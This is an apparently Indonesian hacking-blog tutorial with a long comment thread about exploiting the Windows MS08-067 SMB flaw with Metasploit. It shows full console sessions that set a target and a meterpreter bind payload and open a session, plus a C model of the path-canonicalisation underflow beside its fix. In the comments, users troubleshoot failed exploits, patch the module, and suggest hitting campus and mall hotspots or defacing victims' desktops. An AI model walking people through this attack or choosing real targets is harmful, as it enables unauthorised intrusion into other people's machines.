MS08-067
msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi
Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5803
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Provided by:
hdm
Available targets:
Id Name
-- ----
0 Windows XP SP2 English (DEP)
1 Windows XP SP3 English (DEP)
2 Windows 2003 SP0 English (NO DEP)
3 Windows 2003 SP2 English (NO DEP)
Basic options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 400
Avoid: 7 characters
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing DEP on some operating systems and service
packs. The correct target must be used to prevent the Server Service
(along with a dozen others in the same process) from crashing.
Windows XP targets seem to handle multiple successful exploitation
events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full
support for DEP bypass on 2003, along with other platforms, is still
in development.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
msf exploit(ms08_067_netapi) > set RHOST 192.168.132.130
RHOST => 192.168.132.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target...
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.1:51707 -> 192.168.132.130:4444)
meterpreter > sysinfo
Computer: Research-1
OS : Windows XP (Build 2600, Service Pack 2).
Once again the Windows file-sharing service (SMB over NetBIOS, reached here on TCP 445) is the door into Microsoft Windows. Maybe it is time tutorial writers stopped using the RPC DCOM holes as their standard example of breaking into Microsoft Windows with Metasploit. Note what the module description says about targets: with the wrong TARGET the Server Service, and the dozen other services hosted in the same process, crashes instead of handing over a session, so match the service pack and language before firing (the session above was against a known XP SP2 English box, target 0 in this build, and XP tolerates repeated attempts where 2003 tends to hang).
I think everyone loves 2008...
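The module description above places the flaw in the path canonicalization code of NetAPI32.dll. The C program below is an added example written for this page; it is not the NetAPI32.dll routine and not the Metasploit module. It models the bug class behind CVE-2008-4250, a `\..` resolver that walks backwards to the previous separator without checking that it is still inside its own buffer, side by side with the bounded version. The frame layout (`struct frame`), the buffer sizes and the crafted path `\..\AAAAAAAA` are assumptions made for the demonstration.

```c
/*
 * Added illustration for this page (not NetAPI32.dll and not the Metasploit
 * module): a tiny model of the bug class behind MS08-067 / CVE-2008-4250,
 * a path canonicaliser whose "\.." handling walks backwards for the previous
 * separator with no lower bound.  Frame layout, buffer sizes and the crafted
 * input are assumptions made for the demonstration.
 */
#include <stdio.h>
#include <string.h>

#define BELOW_SZ 32   /* assumed: bytes that sit below the buffer on the stack */
#define OUT_SZ   64   /* assumed: size of the canonicalisation buffer          */

/* Pretend stack layout.  'below' stands in for whatever lives at lower
 * addresses than the output buffer (other locals, saved state, the caller's
 * frame).  The buggy walker may stray into it; the fixed one never does. */
struct frame {
    char below[BELOW_SZ];
    char out[OUT_SZ];
};

static void frame_init(struct frame *f)
{
    memset(f->below, 'X', BELOW_SZ);
    f->below[0] = '\\';   /* a stray separator for the runaway scan to "find" */
    memset(f->out, 0, OUT_SZ);
}

/* Canonicalise 'path' into f->out, resolving each "\.." by stepping back to
 * the previous '\'.
 *   bounded == 0 : the bug class, the backward scan may pass out[0]
 *   bounded == 1 : the fix, a "\.." with no parent component is rejected
 * Returns 0 on success, -1 on rejection or plain output overflow. */
static int canonicalize(struct frame *f, const char *path, int bounded)
{
    char *base = f->out;
    char *end  = f->out + OUT_SZ - 1;   /* leave room for the terminator */
    char *w    = base;                  /* write cursor */
    const char *p = path;

    while (*p) {
        if (p[0] == '\\' && p[1] == '.' && p[2] == '.' &&
            (p[3] == '\\' || p[3] == '\0')) {
            char *k = w - 1;
            if (bounded) {
                while (k >= base && *k != '\\')
                    k--;
                if (k < base)
                    return -1;          /* nothing to climb out of: reject */
            } else {
                /* BUG: no check against base, so the scan reads memory before
                 * out[0] and the copy below then writes there.  The (char *)f
                 * test only keeps this model inside the struct; a real stack
                 * frame has no such fence. */
                while (k > (char *)f && *k != '\\')
                    k--;
            }
            w = k;          /* the next byte copied lands on that separator */
            p += 3;
            continue;
        }
        if (w >= end)
            return -1;      /* ordinary overflow at the top is not modelled */
        *w++ = *p++;
    }
    *w = '\0';
    return 0;
}

static struct frame g_frame;   /* scratch frame for the helpers below */

/* Canonical form of 'path' under the chosen variant, or NULL if rejected. */
static const char *canon_str(const char *path, int bounded)
{
    frame_init(&g_frame);
    return canonicalize(&g_frame, path, bounded) == 0 ? g_frame.out : NULL;
}

/* 1 if the unbounded variant wrote into memory below out[0] for 'path'. */
static int vuln_underflows(const char *path)
{
    int i;
    frame_init(&g_frame);
    canonicalize(&g_frame, path, 0);
    for (i = 1; i < BELOW_SZ; i++)
        if (g_frame.below[i] != 'X')
            return 1;
    return 0;
}

int main(void)
{
    const char *benign  = "\\srv\\share\\..\\other";   /* constructed input */
    const char *crafted = "\\..\\AAAAAAAA";             /* constructed input */

    printf("benign  (fixed) -> %s\n", canon_str(benign, 1));
    printf("crafted (fixed) -> %s\n", canon_str(crafted, 1) ? "accepted" : "rejected");
    printf("crafted (buggy) -> wrote below the buffer: %s\n",
           vuln_underflows(crafted) ? "yes" : "no");
    return 0;
}
```

Build with `cc -std=c99 -o canon canon.c`. On the benign path both variants agree (`\srv\other`); on the crafted one the unbounded walk parks the write cursor inside `below` and the following copy overwrites it, the same shape of error that lets a crafted SMB path corrupt the Server Service's stack, while the bounded variant returns -1 for the same input before anything is written.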
Wow, thanks bro. By the way, how come the 3.2 framework version for Windows isn't out yet?
poniman_coy
31 Oct 08 at 12:43 pm
Metasploit 3.2 is still in testing; to get that version you can update straight from its trunk via svn.
staff
1 Nov 08 at 6:54 am
AFAIK, isn't target 0 the Windows 2000 option? If so, does that mean the return address is the same (and I don't think it is)? So weird.
By the way, the exploit written by EMM works. Anyway, it looks like MSF development is getting more and more bogged down.. hehe
gentoo
3 Nov 08 at 1:42 pm
#3 It depends on the version; if you update from the latest svn there is a lot more target data from various locales, contributed by the MSF community worldwide. The writeup above uses one of the early releases. The RET ADDR is different, of course. Hihi, yes, ever since spoonm and skape stopped being core developers it looks like there will be changes.
msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 2000 English
1 Windows XP SP0 English (NO NX)
2 Windows XP SP1 English (NO NX)
3 Windows XP SP2 English (NX)
4 Windows XP SP2 French (NX)
5 Windows XP SP2 Italian (NX)
6 Windows XP SP2 Portuguese (Brazil) (NX)
7 Windows XP SP2 German (NX)
8 Windows XP SP2 Chinese (NX)
9 Windows XP SP3 French (NX)
10 Windows XP SP3 English (NX)
11 Windows XP SP3 Spanish (NX)
12 Windows XP SP3 German (NX)
13 Windows XP SP3 Portuguese (Brazil) (NX)
14 Windows 2003 SP0 English (NO NX)
15 Windows 2003 SP1 English (NO NX)
16 Windows 2003 SP2 English (NO NX)
17 Windows 2003 SP1 English (NX)
18 Windows 2003 SP2 English (NX)
staff
3 Nov 08 at 3:53 pm
hahaha, yes, sorry, I didn't notice you had already listed it in the article (hmm, not careful enough). I haven't used MSF for a long time, still conventional, stuck on single exploits (they get released faster, especially the ones from irc).
Yes, plus the licence-change issue; it also seems there is a political issue behind the repeated delays in releasing this exploit. Microsoft looks scared.
gentoo
5 Nov 08 at 10:02 am
Sir, I updated metasploit on Thursday, 6 Nov 2008 (command = "svn update"), but it doesn't run...
The error is like this:
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[-] Exploit failed: can't convert nil into Integer
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
But when I updated on Wednesday, 5 Nov 2008, the exploit ran, on the same computer (my own LAN). Why is that, sir?
Or could I ask for your "ms08_067_netapi.rb" file? Please send it to my e-mail, sir...
Thank you...
franky
6 Nov 08 at 4:19 pm
@poniman_coy
If you want to use the 3.2-testing version on WINDOWS you have to update via svn. The command is "svn co http://metasploit.com/svn/framework3/trunk"
@franky
"Exploit failed: can't convert nil into Integer". When I contacted the owner, HD Moore, he said that on certain SPs it does happen like that... but hold on... take a look at the script with notepad.
Find the word "Sratch" and replace it with "Scratch". In my opinion that is why the revision 5846 patch fails. Or just wait for the next patch; the typo may be corrected by then.
To all: I'm new here and need to learn a lot from you all, especially writing exploit code.
Thanks
-Corbinz-
CorbinZ
6 Nov 08 at 10:16 pm
#6, as CorbinZ said, there is a typo in the Scratch address part of every target. In that update it is written as Sratch instead of Scratch. I tried updating from the same trunk as you and got the same error; just replace Sratch with Scratch.
$ sed -i 's/Sratch/Scratch/g' ms08_067_netapi.rb
#7, Welcome... =)
staff
7 Nov 08 at 12:56 pm
Whoa, cooler and cooler, the young people of today..
**I have never even used metasploit and can't**
Ph03n1X
7 Nov 08 at 1:09 pm
** Ugh, I've never been able to use Metasploit... Just my luck **
scut
8 Nov 08 at 10:20 am
@corbinZ and @staff
The exploit is running again, thanks a lot...
@ph03n1x and @scut
Just keep trying, don't give up, and if there's an error it can be discussed here....
franky
8 Nov 08 at 2:41 pm
#10
That's why, don't wait for a hand-out! Find it yourself =))
#11
Yes siiiir, boss
Ph03n1X
9 Nov 08 at 3:15 am
I have installed BT3F and updated its msf3. Roughly, what is the next step after "PAYLOAD windows/meterpreter/bind_tcp"? Sorry, I just want to know. I have no test bed to try it on. Thanks to anyone willing to answer.
QU1NT1N
10 Nov 08 at 4:15 am
@QU1NT1N
Just type "help"; it will list the features available in meterpreter....
Have fun trying..
franky
10 Nov 08 at 7:48 am
@CorbinZ thanks bro, it runs now.
poniman_coy
10 Nov 08 at 1:38 pm
Is that how it is, mas franky? OK then, I'll go borrow a pirated CD first...
QU1NT1N
10 Nov 08 at 5:30 pm
Hmm, why is it, sir: when I run svn co http://metasploit.com/svn/framework3/trunk it runs, and when it finishes it says checked out revision 5846. Your suggestion above was to replace the word Sratch with Scratch, but when I check, the word sratch is no longer there, only Scratch, so it's already correct. Yet when I use windows/smb/ms08_067_netapi it fails. Is there still something wrong? Is it because I'm using metasploit 3.0, do I have to use 3.1?
poniman_coy
10 Nov 08 at 6:45 pm
http://www.kecoak-elektronik.net/log/2008/10/31/ms08-067/
check this out…
dsh3ll.d
11 Nov 08 at 11:58 am
http://video.google.com/videoplay?docid=-5555664098592837592
dsh3ll.d
11 Nov 08 at 12:00 pm
#12 I'm going to Bandung on 15 November; if you want to come along, confirm with Opik.
scut
11 Nov 08 at 1:12 pm
@poniman_coy
YUP... just use 3.1, it's more up to date...
CorbinZ
11 Nov 08 at 10:53 pm
#20, keep an eye on the girls in Bandung for me, I haven't visited in a long time =))
staff
11 Nov 08 at 11:22 pm
@CorbinZ I'll try it, bro...
@http://video.google.com/videoplay?docid=-5555664098592837592 , you go blind watching that video... the picture is all broken up..
poniman_coy
12 Nov 08 at 1:00 am
Asking permission to download the video.
QU1NT1N
12 Nov 08 at 4:54 am
I am using Metasploit version 3.1 for Windows. It has been updated with the Online Update, but there is still no exploit for MS08-067... I already have ms08_067_netapi.rb, so how do I integrate it into the Metasploit Framework???
Thanks
asmssl
17 Nov 08 at 4:53 am
Sir, how do I configure svn when using an http proxy? I tried but it keeps failing.
zodiac
18 Nov 08 at 2:47 pm
After "svn co http://metasploit.com/svn/framework3/trunk" it still says
msf > version
Framework: 3.1-release.5366
Console : 3.1-release.5404
When I run "svn update" it prints
Skipped '.'
Please, a solution
f4r1z
19 Nov 08 at 9:08 am
Hmm, still confused hehehehe.. there's really nowhere to explore it..
b4tn3t
1 Dec 08 at 10:33 am
@f4riz
Just download version 3.2, it has been released...
@b4tn3t
As for targets, you can look at campuses and malls that provide hotspots...
Does anyone know of or have a video on defacing the target's desktop??
Thanks all...
franky
5 Dec 08 at 8:26 am
@franky
Yes, I downloaded it and it worked, thanks to everyone at kecoak, I learned something new
f4r1z
10 Dec 08 at 10:37 pm
Cool, now the question is how to defend against it. Anyone know? Don't let it be that after we attack we get attacked back and lose completely :)
Btw, does anyone know how to install additional modules/exploits in metasploit?
iroel
20 Dec 08 at 10:56 pm
^-- just run Start -> Programs -> Metasploit 3 -> Online Update,,
it downloads by itself ^_^
Wow, great, it can be used on XP SP2,
btw, how do we open port 445 on the target computer so we can deliver this exploit? Anyone know? plz . . .
asik2
30 Dec 08 at 8:51 pm
#31
Defend? Just update your Windows :p
#32
Open the port? Uninstall the update :p
CyberTank
8 Jan 09 at 6:03 pm
Opening the port is probably hard; better to scan for port 445. But it takes a looong time...
youthanesia
1 Feb 09 at 12:42 am
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
# Why doesn't it work?? Any ideas, friends?
az
15 May 09 at 10:23 pm
Yeah, I have the same problem as #35
.....
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
Why is that, bro?
grind
11 Jun 09 at 6:31 am
Same here... never succeeds.
Always FAILS... phew
NewBie
18 Jul 09 at 9:05 am
A hot afternoon:
I tried to follow this but it always shows:
>> exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
Thanks for the info
cemens
30 Jul 09 at 12:21 pm
The portable version of Metasploit 3.2 can be downloaded from http://www.indowebster.com/Metasploit_Framework_32_Portable.html Please use it wisely.
I tried the same thing as the tutorial. The DOS prompt session doesn't appear. With the windows/shell_bind_tcp payload the session closes straight away when I want to open the target's DOS prompt. Anyone know the cause? Here is the output:
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 2 opened (192.168.0.6:1661 -> 192.168.0.1:4545)
[*] Command shell session 2 closed.
iroel
6 Oct 09 at 4:40 pm
lol
happy playing
playing for happy
wtf
rooted.slash
24 Oct 09 at 12:28 am